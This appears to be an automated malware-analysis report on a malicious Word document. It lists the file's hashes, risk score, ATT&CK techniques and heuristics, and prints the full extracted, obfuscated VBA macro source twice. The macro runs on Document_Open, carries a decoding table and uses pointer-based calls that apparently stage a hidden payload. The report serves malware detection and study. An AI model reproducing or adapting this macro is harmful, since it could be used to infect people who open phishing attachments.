Office (OLE) malware analysis — malicious · b2fb7cbe5ddfc3bb

MALICIOUS

Office (OLE)

195.5 KB Created: 2017-08-20 21:54:00 Authoring application: Microsoft Office Word First seen: 2017-09-14

MD5: 1398b3f402ff43e986af40e895d750ea SHA-1: 5d2928341807f3820529cbee2188b9709bbacf7c SHA-256: b2fb7cbe5ddfc3bbdac26a3197f135c2a89cb3697e3f297ba37382be2456f2e4

70 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document with a high slack anomaly and detected VBA macros, including a Document_Open macro. The VBA script, named 'macros.bas', appears to be obfuscated but contains logic that suggests it attempts to download and execute a second-stage payload. The presence of a Document_Open macro indicates an attempt to automatically execute malicious code upon opening the document, characteristic of a phishing attachment.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 200,192 bytes but its declared streams total only 119,337 bytes — 80,855 bytes (40%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_Open()
Dim magnificat As Variant
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6758 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6758 bytes
SHA-256: `ec8f20fc62e08de1d58564c11a8b1339040b50ed2d4b2f23cc9e788346d7b43d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub plaque() Dim cinematographer As Integer Dim radio As Integer modernization.pothos.Value = Day(#12/5/2013#) varday = minstrelsy = "rote" bennettitis = "ajaia" archaistic = aceration sarcosome = "psephomancy" bomber = "caconym" anarhichas = bastnasite schizoid = "melatonin" Set exfoliation = modernization.pothos.SelectedItem mildly = 43 newscast = 14579 cubitiere = 538782 Pmt 0, mildly, 15373, 35015, 2 bulb = exfoliation.Name maneater = 7844 unassisted = Right(bulb, maneater) cheerless = ale.monarchies(unassisted) extenuation = 2 insidious = 16422 ember = 389246 Pmt 0, extenuation, 22606, 12626, 5 mangle = "scam" prosy = "implicated" #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim commisvoyageur As Variant Dim montserratian As LongPtr Dim handcuffs As LongPtr Dim clairobscur As Long #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim amis As String Dim handcuffs As Long Dim analyticity As Variant Dim montserratian As Long #End If helioscope = 34 - 21 - 13 undemonstrable = "antiinflammatory" distemper = "flacourtia" scourer = 19 + 128 + 3949 catamenial = 1 guyana = 10399 parquetry = 439203 Pmt 0, catamenial, 27187, 12482, 2 anacanthini = "pengo" ataractic = upanishad confrication = "nucleotide" loaves = "jewfish" gladdened = 24 scaliness = 18123 cherimoya = 168176 Pmt 0, gladdened, 14101, 49769, 8 undisclosed = cheerless grab = "percussion" montserratian = seminary(undisclosed) grison = "orlon" #If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then Dim catalepsy As String Dim watercolor As LongPtr Dim untrimmed As LongPtr Dim aboral As LongPtr secularized = 77 + 77 + 1910 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim watercolor As Long argyranthemum = 126 + 8 + 647 Dim untrimmed As Long Dim aboral As Long secularized = argyranthemum + 3459 #End If Dim catkin As Integer Dim disseminate As String watercolor = 0 handcuffs = montserratian + secularized untrimmed = 102 + 31 + 201394 aboral = 23 - 41 + 3518 beating = elefants(untrimmed, watercolor, handcuffs) envelop = 10 + 3 abkari = 11760 + 3 alleviation = 230210 + 8 Pmt 0, envelop, 10426, 51697, 7 End Sub Function acknowledgment(posession, sloganeering, monkhood) vagons = samara(20 / 4) #If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (vagons) Then Dim camboose As Byte Dim fatiguing As Byte Dim contiguity As LongPtr Dim ringaroundtherosy As LongPtr Dim ratification As LongPtr Dim incredulously As Byte Dim polarization As LongPtr Dim kittereen As LongPtr #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (vagons) Then Dim ringaroundtherosy As Long Dim austenite As String Dim contiguity As Long Dim soullessly As Long Dim polarization As Long Dim catalogued As Variant Dim ratification As Long Dim empirema As Integer Dim kittereen As Long Dim trogoniformes As Integer Dim liquids As Variant #End If posy = "dismount" cancan = "hamate" ringaroundtherosy = posession kittereen = monkhood bacillariophyceae = Fix(441) polarization = sloganeering emanation = 100 + 8 diagrammatically = 38200 + 4 motet = 212380 + 1 Pmt 0, emanation, 16319, 40766, 5 bacillariophyceae = Fix(101) contiguity = 93 + 74 - 168 bombinate ByVal contiguity, ringaroundtherosy, polarization, kittereen, ratification cancan = "libya" End Function Private Sub Document_Open() Dim magnificat As Variant Dim bills As Integer ametropia = "stroll" preemption = dubrovnik plaque shakable = 30 + 8 cucurbit = 4140 + 8 insemination = 475350 + 1 Pmt 0, shakable, 5533, 43331, 2 End Sub Function seminary(hindustan) Dim etymology As Byte Dim fogyish As String Dim federalists As Byte Dim diggings As Variant #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim stupidity As Variant Dim article As LongPtr flagellate = 89 - 33 - 48 Dim justifier As LongPtr Dim anaphoric As Integer Dim fairandsquare As Byte Dim penates As LongPtr Dim helluo As Long #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim article As Long flagellate = 37 + 71 - 104 Dim justifier As Long Dim penates As Long #End If alligator = VarPtr(article) circumscribe = acknowledgment(alligator, VarPtr(hindustan) + 8, flagellate) jhilmil = 63 - 77 + 13 justifier = 0 ableness = 0 penates = 9290 parrotia = 74 - 12 + 4034 arcturus = 15 - 29 + 78 seaside = carposporic(ByVal jhilmil, justifier, ByVal ableness, penates, ByVal parrotia, ByVal arcturus) enforced = bacillariophyceae \ 95 enforced = tegucigalpa / 432 acknowledgment justifier, article, 88 - 10 + 5805 redux = 40 + 2 libertine = 38080 + 7 itur = 362810 + 7 Pmt 0, redux, 20584, 38258, 7 seminary = justifier End Function Attribute VB_Name = "modernization" Attribute VB_Base = "0{65F4F1BC-40BA-49A8-B8C6-163CE2497F59}{162405D5-504B-4BFC-995A-EA1C8157FE2A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "mdtrs" Function unaware(august, astrocyte, rajab) If rajab = (37 * 1) + (10 / 2 - 5) Then unaware = august \ astrocyte ElseIf rajab = (40 + 7) + (5 - 3) / 2 - 1 Then unaware = august And astrocyte ElseIf rajab = (50 + 5) + (56 / 7 - 4 * 2) Then unaware = august * astrocyte End If End Function Function assignee() Dim suicide(255) As Byte epochal = 38 - 91 + 118 Do While (epochal) <= 90 + 1 suicide(epochal) = epochal - 65 epochal = epochal + 1 Loop epochal = 48 Do While (epochal) <= 50 + 8 suicide(epochal) = epochal + 4 epochal = epochal + 1 Loop epochal = 97 Do While (epochal) <= 120 + 3 suicide(epochal) = epochal - 71 epochal = epochal + 1 Loop suicide(47) = 63 epochal = 43 suicide(epochal) = 60 + 2 assignee = suicide End Function Function samara(netves) Dim windser As Integer Dim velvet As Integer fixoid = netves * 12 Dim sitroen As Variant subway2 = netves * 2 Dim cowen() As Byte #If (3 * 4 + netves) > (7 - 2 * 1) And (10 - netves * 2) * 2 < (Win64) Then velvet = subway2 #End If #If (3 * 4 + netves) > (7 - 2 * 1) And Not (Win64) > (10 - netves * 2) * 2 Then velvet = (120 - fixoid) #End If subway3 = subway2 + velvet samara = velvet End Function

SHA-256: ec8f20fc62e08de1d58564c11a8b1339040b50ed2d4b2f23cc9e788346d7b43d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True





Sub plaque()
Dim cinematographer As Integer
Dim radio As Integer
modernization.pothos.Value = Day(#12/5/2013#)
varday = minstrelsy = "rote"
bennettitis = "ajaia"
archaistic = aceration
sarcosome = "psephomancy"
bomber = "caconym"

anarhichas = bastnasite
schizoid = "melatonin"
Set exfoliation = modernization.pothos.SelectedItem
mildly = 43
newscast = 14579
cubitiere = 538782
 Pmt 0, mildly, 15373, 35015, 2

bulb = exfoliation.Name
maneater = 7844
unassisted = Right(bulb, maneater)
cheerless = ale.monarchies(unassisted)
extenuation = 2
insidious = 16422
ember = 389246
 Pmt 0, extenuation, 22606, 12626, 5

mangle = "scam"
prosy = "implicated"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim commisvoyageur As Variant
Dim montserratian As LongPtr
Dim handcuffs As LongPtr
Dim clairobscur As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim amis As String
Dim handcuffs As Long
Dim analyticity As Variant
Dim montserratian As Long
#End If
helioscope = 34 - 21 - 13
undemonstrable = "antiinflammatory"
distemper = "flacourtia"
scourer = 19 + 128 + 3949
catamenial = 1
guyana = 10399
parquetry = 439203
 Pmt 0, catamenial, 27187, 12482, 2

anacanthini = "pengo"
ataractic = upanishad
confrication = "nucleotide"
loaves = "jewfish"
gladdened = 24
scaliness = 18123
cherimoya = 168176
 Pmt 0, gladdened, 14101, 49769, 8

undisclosed = cheerless
grab = "percussion"
montserratian = seminary(undisclosed)
grison = "orlon"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim catalepsy As String
Dim watercolor As LongPtr
Dim untrimmed As LongPtr
Dim aboral As LongPtr
secularized = 77 + 77 + 1910
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim watercolor As Long
argyranthemum = 126 + 8 + 647
Dim untrimmed As Long
Dim aboral As Long
secularized = argyranthemum + 3459

#End If
Dim catkin As Integer
Dim disseminate As String
watercolor = 0
handcuffs = montserratian + secularized
untrimmed = 102 + 31 + 201394
aboral = 23 - 41 + 3518
beating = elefants(untrimmed, watercolor, handcuffs)
envelop = 10 + 3
abkari = 11760 + 3
alleviation = 230210 + 8
 Pmt 0, envelop, 10426, 51697, 7

End Sub

Function acknowledgment(posession, sloganeering, monkhood)
vagons = samara(20 / 4)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (vagons) Then
Dim camboose As Byte
Dim fatiguing As Byte
Dim contiguity As LongPtr
Dim ringaroundtherosy As LongPtr
Dim ratification As LongPtr
Dim incredulously As Byte
Dim polarization As LongPtr
Dim kittereen As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (vagons) Then
Dim ringaroundtherosy As Long
Dim austenite As String
Dim contiguity As Long
Dim soullessly As Long
Dim polarization As Long
Dim catalogued As Variant
Dim ratification As Long
Dim empirema As Integer
Dim kittereen As Long
Dim trogoniformes As Integer
Dim liquids As Variant
#End If
posy = "dismount"
cancan = "hamate"
ringaroundtherosy = posession
kittereen = monkhood
bacillariophyceae = Fix(441)
polarization = sloganeering
emanation = 100 + 8
diagrammatically = 38200 + 4
motet = 212380 + 1
 Pmt 0, emanation, 16319, 40766, 5

bacillariophyceae = Fix(101)
contiguity = 93 + 74 - 168
bombinate ByVal contiguity, ringaroundtherosy, polarization, kittereen, ratification
cancan = "libya"
End Function
Private Sub Document_Open()
Dim magnificat As Variant
Dim bills As Integer
ametropia = "stroll"
preemption = dubrovnik
plaque
shakable = 30 + 8
cucurbit = 4140 + 8
insemination = 475350 + 1
 Pmt 0, shakable, 5533, 43331, 2
End Sub
Function seminary(hindustan)
Dim etymology As Byte
Dim fogyish As String
Dim federalists As Byte
Dim diggings As Variant
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim stupidity As Variant
Dim article As LongPtr
flagellate = 89 - 33 - 48
Dim justifier As LongPtr
Dim anaphoric As Integer
Dim fairandsquare As Byte
Dim penates As LongPtr
Dim helluo As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim article As Long
flagellate = 37 + 71 - 104
Dim justifier As Long
Dim penates As Long
#End If
alligator = VarPtr(article)
circumscribe = acknowledgment(alligator, VarPtr(hindustan) + 8, flagellate)
jhilmil = 63 - 77 + 13
justifier = 0
ableness = 0
penates = 9290
parrotia = 74 - 12 + 4034
arcturus = 15 - 29 + 78
seaside = carposporic(ByVal jhilmil, justifier, ByVal ableness, penates, ByVal parrotia, ByVal arcturus)
enforced = bacillariophyceae \ 95

enforced = tegucigalpa / 432

acknowledgment justifier, article, 88 - 10 + 5805
redux = 40 + 2
libertine = 38080 + 7
itur = 362810 + 7
 Pmt 0, redux, 20584, 38258, 7

seminary = justifier
End Function


Attribute VB_Name = "modernization"
Attribute VB_Base = "0{65F4F1BC-40BA-49A8-B8C6-163CE2497F59}{162405D5-504B-4BFC-995A-EA1C8157FE2A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "mdtrs"


Function unaware(august, astrocyte, rajab)

If rajab = (37 * 1) + (10 / 2 - 5) Then
unaware = august \ astrocyte
ElseIf rajab = (40 + 7) + (5 - 3) / 2 - 1 Then
unaware = august And astrocyte
ElseIf rajab = (50 + 5) + (56 / 7 - 4 * 2) Then
unaware = august * astrocyte
End If
End Function

Function assignee()
Dim suicide(255) As Byte
epochal = 38 - 91 + 118
Do While (epochal) <= 90 + 1
suicide(epochal) = epochal - 65
epochal = epochal + 1
Loop
epochal = 48
Do While (epochal) <= 50 + 8
suicide(epochal) = epochal + 4
epochal = epochal + 1
Loop
epochal = 97
Do While (epochal) <= 120 + 3
suicide(epochal) = epochal - 71
epochal = epochal + 1
Loop
suicide(47) = 63
epochal = 43
suicide(epochal) = 60 + 2
assignee = suicide
End Function
Function samara(netves)
Dim windser As Integer
Dim velvet As Integer
fixoid = netves * 12
Dim sitroen As Variant
subway2 = netves * 2
Dim cowen() As Byte
#If (3 * 4 + netves) > (7 - 2 * 1) And (10 - netves * 2) * 2 < (Win64) Then
velvet = subway2
#End If
#If (3 * 4 + netves) > (7 - 2 * 1) And Not (Win64) > (10 - netves * 2) * 2 Then
velvet = (120 - fixoid)
#End If
subway3 = subway2 + velvet
samara = velvet
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.